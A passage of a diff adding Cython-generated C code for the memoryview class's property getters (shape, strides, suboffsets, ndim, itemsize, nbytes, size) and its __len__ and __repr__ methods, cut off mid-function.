+ + /* "View.MemoryView":564 + * return self._get_base() + * + * cdef _get_base(self): # <<<<<<<<<<<<<< + * return self.obj + * + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":567 + * return self.obj + * + * @property # <<<<<<<<<<<<<< + * def shape(self): + * return tuple([length for length in self.view.shape[:self.view.ndim]]) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_5shape_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_5shape_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_5shape___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_5shape___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + Py_ssize_t __pyx_7genexpr__pyx_v_length; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + Py_ssize_t *__pyx_t_2; + Py_ssize_t *__pyx_t_3; + Py_ssize_t *__pyx_t_4; + PyObject *__pyx_t_5 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":569 + * @property + * def shape(self): + * return tuple([length for length in self.view.shape[:self.view.ndim]]) # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + { /* enter inner scope */ + __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 569, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = (__pyx_v_self->view.shape + __pyx_v_self->view.ndim); + for (__pyx_t_4 = __pyx_v_self->view.shape; __pyx_t_4 < __pyx_t_3; __pyx_t_4++) { + __pyx_t_2 = __pyx_t_4; + __pyx_7genexpr__pyx_v_length = (__pyx_t_2[0]); + __pyx_t_5 = PyInt_FromSsize_t(__pyx_7genexpr__pyx_v_length); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 569, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + if (unlikely(__Pyx_ListComp_Append(__pyx_t_1, (PyObject*)__pyx_t_5))) __PYX_ERR(1, 569, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + } /* exit inner scope */ + __pyx_t_5 = PyList_AsTuple(((PyObject*)__pyx_t_1)); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 569, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_r = __pyx_t_5; + __pyx_t_5 = 0; + goto __pyx_L0; + + /* "View.MemoryView":567 + * return self.obj + * + * @property # <<<<<<<<<<<<<< + * def shape(self): + * return tuple([length for length in self.view.shape[:self.view.ndim]]) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("View.MemoryView.memoryview.shape.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":571 + * return tuple([length for length in self.view.shape[:self.view.ndim]]) + * + * @property # <<<<<<<<<<<<<< + * def strides(self): + * if self.view.strides == NULL: + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_7strides_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_7strides_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_7strides___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_7strides___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + Py_ssize_t __pyx_8genexpr1__pyx_v_stride; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + Py_ssize_t *__pyx_t_3; + Py_ssize_t *__pyx_t_4; + Py_ssize_t *__pyx_t_5; + PyObject *__pyx_t_6 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":573 + * @property + * def strides(self): + * if self.view.strides == NULL: # <<<<<<<<<<<<<< + * + * raise ValueError, "Buffer view does not expose strides" + */ + __pyx_t_1 = (__pyx_v_self->view.strides == NULL); + if (unlikely(__pyx_t_1)) { + + /* "View.MemoryView":575 + * if self.view.strides == NULL: + * + * raise ValueError, "Buffer view does not expose strides" # <<<<<<<<<<<<<< + * + * return tuple([stride for stride in self.view.strides[:self.view.ndim]]) + */ + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_kp_s_Buffer_view_does_not_expose_stri, 0, 0); + __PYX_ERR(1, 575, __pyx_L1_error) + + /* "View.MemoryView":573 + * @property + * def strides(self): + * if self.view.strides == NULL: # <<<<<<<<<<<<<< + * + * raise ValueError, "Buffer view does not expose strides" + */ + } + + /* "View.MemoryView":577 + * raise ValueError, "Buffer view does not expose strides" + * + * return tuple([stride for stride in self.view.strides[:self.view.ndim]]) # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + { /* enter inner scope */ + __pyx_t_2 = PyList_New(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 577, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = (__pyx_v_self->view.strides + __pyx_v_self->view.ndim); + for (__pyx_t_5 = __pyx_v_self->view.strides; __pyx_t_5 < __pyx_t_4; __pyx_t_5++) { + __pyx_t_3 = __pyx_t_5; + __pyx_8genexpr1__pyx_v_stride = (__pyx_t_3[0]); + __pyx_t_6 = PyInt_FromSsize_t(__pyx_8genexpr1__pyx_v_stride); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 577, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + if (unlikely(__Pyx_ListComp_Append(__pyx_t_2, (PyObject*)__pyx_t_6))) __PYX_ERR(1, 577, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + } + } /* exit inner scope */ + __pyx_t_6 = PyList_AsTuple(((PyObject*)__pyx_t_2)); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 577, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_r = __pyx_t_6; + __pyx_t_6 = 0; + goto __pyx_L0; + + /* "View.MemoryView":571 + * return tuple([length for length in self.view.shape[:self.view.ndim]]) + * + * @property # <<<<<<<<<<<<<< + * def strides(self): + * if self.view.strides == NULL: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_AddTraceback("View.MemoryView.memoryview.strides.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":579 + * return tuple([stride for stride in self.view.strides[:self.view.ndim]]) + * + * @property # <<<<<<<<<<<<<< + * def suboffsets(self): + * if self.view.suboffsets == NULL: + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_10suboffsets_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_10suboffsets_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_10suboffsets___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_10suboffsets___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + Py_ssize_t __pyx_8genexpr2__pyx_v_suboffset; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + Py_ssize_t *__pyx_t_3; + Py_ssize_t *__pyx_t_4; + Py_ssize_t *__pyx_t_5; + PyObject *__pyx_t_6 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":581 + * @property + * def suboffsets(self): + * if self.view.suboffsets == NULL: # <<<<<<<<<<<<<< + * return (-1,) * self.view.ndim + * + */ + __pyx_t_1 = (__pyx_v_self->view.suboffsets == NULL); + if (__pyx_t_1) { + + /* "View.MemoryView":582 + * def suboffsets(self): + * if self.view.suboffsets == NULL: + * return (-1,) * self.view.ndim # <<<<<<<<<<<<<< + * + * return tuple([suboffset for suboffset in self.view.suboffsets[:self.view.ndim]]) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __Pyx_PySequence_Multiply(__pyx_tuple__4, __pyx_v_self->view.ndim); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 582, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":581 + * @property + * def suboffsets(self): + * if self.view.suboffsets == NULL: # <<<<<<<<<<<<<< + * return (-1,) * self.view.ndim + * + */ + } + + /* "View.MemoryView":584 + * return (-1,) * self.view.ndim + * + * return tuple([suboffset for suboffset in self.view.suboffsets[:self.view.ndim]]) # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + { /* enter inner scope */ + __pyx_t_2 = PyList_New(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 584, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = (__pyx_v_self->view.suboffsets + __pyx_v_self->view.ndim); + for (__pyx_t_5 = __pyx_v_self->view.suboffsets; __pyx_t_5 < __pyx_t_4; __pyx_t_5++) { + __pyx_t_3 = __pyx_t_5; + __pyx_8genexpr2__pyx_v_suboffset = (__pyx_t_3[0]); + __pyx_t_6 = PyInt_FromSsize_t(__pyx_8genexpr2__pyx_v_suboffset); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 584, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + if (unlikely(__Pyx_ListComp_Append(__pyx_t_2, (PyObject*)__pyx_t_6))) __PYX_ERR(1, 584, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + } + } /* exit inner scope */ + __pyx_t_6 = PyList_AsTuple(((PyObject*)__pyx_t_2)); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 584, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_r = __pyx_t_6; + __pyx_t_6 = 0; + goto __pyx_L0; + + /* "View.MemoryView":579 + * return tuple([stride for stride in self.view.strides[:self.view.ndim]]) + * + * @property # <<<<<<<<<<<<<< + * def suboffsets(self): + * if self.view.suboffsets == NULL: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_AddTraceback("View.MemoryView.memoryview.suboffsets.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":586 + * return tuple([suboffset for suboffset in self.view.suboffsets[:self.view.ndim]]) + * + * @property # <<<<<<<<<<<<<< + * def ndim(self): + * return self.view.ndim + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_4ndim_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_4ndim_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_4ndim___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_4ndim___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":588 + * @property + * def ndim(self): + * return self.view.ndim # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyInt_From_int(__pyx_v_self->view.ndim); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 588, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "View.MemoryView":586 + * return tuple([suboffset for suboffset in self.view.suboffsets[:self.view.ndim]]) + * + * @property # <<<<<<<<<<<<<< + * def ndim(self): + * return self.view.ndim + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.memoryview.ndim.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":590 + * return self.view.ndim + * + * @property # <<<<<<<<<<<<<< + * def itemsize(self): + * return self.view.itemsize + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_8itemsize_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_8itemsize_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_8itemsize___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_8itemsize___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":592 + * @property + * def itemsize(self): + * return self.view.itemsize # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyInt_FromSsize_t(__pyx_v_self->view.itemsize); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 592, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "View.MemoryView":590 + * return self.view.ndim + * + * @property # <<<<<<<<<<<<<< + * def itemsize(self): + * return self.view.itemsize + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("View.MemoryView.memoryview.itemsize.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":594 + * return self.view.itemsize + * + * @property # <<<<<<<<<<<<<< + * def nbytes(self): + * return self.size * self.view.itemsize + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_6nbytes_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_6nbytes_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_6nbytes___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_6nbytes___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":596 + * @property + * def nbytes(self): + * return self.size * self.view.itemsize # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_size); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 596, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = PyInt_FromSsize_t(__pyx_v_self->view.itemsize); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 596, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PyNumber_Multiply(__pyx_t_1, __pyx_t_2); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 596, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_r = __pyx_t_3; + __pyx_t_3 = 0; + goto __pyx_L0; + + /* "View.MemoryView":594 + * return self.view.itemsize + * + * @property # <<<<<<<<<<<<<< + * def nbytes(self): + * return self.size * self.view.itemsize + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView.memoryview.nbytes.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":598 + * return self.size * self.view.itemsize + * + * @property # <<<<<<<<<<<<<< + * def size(self): + * if self._size is None: + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_4size_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_15View_dot_MemoryView_10memoryview_4size_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_15View_dot_MemoryView_10memoryview_4size___get__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_4size___get__(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_v_result = NULL; + PyObject *__pyx_v_length = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + Py_ssize_t *__pyx_t_2; + Py_ssize_t *__pyx_t_3; + Py_ssize_t *__pyx_t_4; + PyObject *__pyx_t_5 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "View.MemoryView":600 + * @property + * def size(self): + * if self._size is None: # <<<<<<<<<<<<<< + * result = 1 + * + */ + __pyx_t_1 = (__pyx_v_self->_size == Py_None); + if (__pyx_t_1) { + + /* "View.MemoryView":601 + * def size(self): + * if self._size is None: + * result = 1 # <<<<<<<<<<<<<< + * + * for length in self.view.shape[:self.view.ndim]: + */ + __Pyx_INCREF(__pyx_int_1); + __pyx_v_result = __pyx_int_1; + + /* "View.MemoryView":603 + * result = 1 + * + * for length in self.view.shape[:self.view.ndim]: # <<<<<<<<<<<<<< + * result *= length + * + */ + __pyx_t_3 = (__pyx_v_self->view.shape + __pyx_v_self->view.ndim); + for (__pyx_t_4 = __pyx_v_self->view.shape; __pyx_t_4 < __pyx_t_3; __pyx_t_4++) { + __pyx_t_2 = __pyx_t_4; + __pyx_t_5 = PyInt_FromSsize_t((__pyx_t_2[0])); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 603, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_XDECREF_SET(__pyx_v_length, __pyx_t_5); + __pyx_t_5 = 0; + + /* "View.MemoryView":604 + * + * for length in self.view.shape[:self.view.ndim]: + * result *= length # <<<<<<<<<<<<<< + * + * self._size = result + */ + __pyx_t_5 = PyNumber_InPlaceMultiply(__pyx_v_result, __pyx_v_length); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 604, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF_SET(__pyx_v_result, __pyx_t_5); + __pyx_t_5 = 0; + } + + /* "View.MemoryView":606 + * result *= length + * + * self._size = result # <<<<<<<<<<<<<< + * + * return self._size + */ + __Pyx_INCREF(__pyx_v_result); + __Pyx_GIVEREF(__pyx_v_result); + __Pyx_GOTREF(__pyx_v_self->_size); + __Pyx_DECREF(__pyx_v_self->_size); + __pyx_v_self->_size = __pyx_v_result; + + /* "View.MemoryView":600 + * @property + * def size(self): + * if self._size is None: # <<<<<<<<<<<<<< + * result = 1 + * + */ + } + + /* "View.MemoryView":608 + * self._size = result + * + * return self._size # <<<<<<<<<<<<<< + * + * def __len__(self): + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_self->_size); + __pyx_r = __pyx_v_self->_size; + goto __pyx_L0; + + /* "View.MemoryView":598 + * return self.size * self.view.itemsize + * + * @property # <<<<<<<<<<<<<< + * def size(self): + * if self._size is None: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("View.MemoryView.memoryview.size.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_result); + __Pyx_XDECREF(__pyx_v_length); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":610 + * return self._size + * + * def __len__(self): # <<<<<<<<<<<<<< + * if self.view.ndim >= 1: + * return self.view.shape[0] + */ + +/* Python wrapper */ +static Py_ssize_t __pyx_memoryview___len__(PyObject *__pyx_v_self); /*proto*/ +static Py_ssize_t __pyx_memoryview___len__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + Py_ssize_t __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__len__ (wrapper)", 0); + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_10__len__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static Py_ssize_t __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_10__len__(struct __pyx_memoryview_obj *__pyx_v_self) { + Py_ssize_t __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + __Pyx_RefNannySetupContext("__len__", 0); + + /* "View.MemoryView":611 + * + * def __len__(self): + * if self.view.ndim >= 1: # <<<<<<<<<<<<<< + * return self.view.shape[0] + * + */ + __pyx_t_1 = (__pyx_v_self->view.ndim >= 1); + if (__pyx_t_1) { + + /* "View.MemoryView":612 + * def __len__(self): + * if self.view.ndim >= 1: + * return self.view.shape[0] # <<<<<<<<<<<<<< + * + * return 0 + */ + __pyx_r = (__pyx_v_self->view.shape[0]); + goto __pyx_L0; + + /* "View.MemoryView":611 + * + * def __len__(self): + * if self.view.ndim >= 1: # <<<<<<<<<<<<<< + * return self.view.shape[0] + * + */ + } + + /* "View.MemoryView":614 + * return self.view.shape[0] + * + * return 0 # <<<<<<<<<<<<<< + * + * def __repr__(self): + */ + __pyx_r = 0; + goto __pyx_L0; + + /* "View.MemoryView":610 + * return self._size + * + * def __len__(self): # <<<<<<<<<<<<<< + * if self.view.ndim >= 1: + * return self.view.shape[0] + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":616 + * return 0 + * + * def __repr__(self): # <<<<<<<<<<<<<< + * return "" % (self.base.__class__.__name__, + * id(self)) + */ + +/* Python wrapper */ +static PyObject *__pyx_memoryview___repr__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_memoryview___repr__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__repr__ (wrapper)", 0); + __pyx_r = __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_12__repr__(((struct __pyx_memoryview_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_12__repr__(struct __pyx_memoryview_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__repr__", 0); + + /* "View.MemoryView":617 + * + * def __repr__(self): + * return "" % (self.base.__class__.__name__, # <<<<<<<<<<<<<< + * id(self)) + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_base); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 617, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_class); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 617, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_name_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 617, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "View.MemoryView":618 + * def __repr__(self): + * return "" % (self.base.__class__.__name__, + * id(self)) # <<<<<<<<<<<<<< + * + * def __str__(self): + */ + __pyx_t_2 = __Pyx_PyObject_CallOneArg(__pyx_builtin_id, ((PyObject *)__pyx_v_self)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 618, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + + /* "View.MemoryView":617 + * + * def __repr__(self): + * return "" % (self.base.__class__.__name__, # <<<<<<<<<<<<<< + * id(self)) + * + */ + __pyx_t_3 = 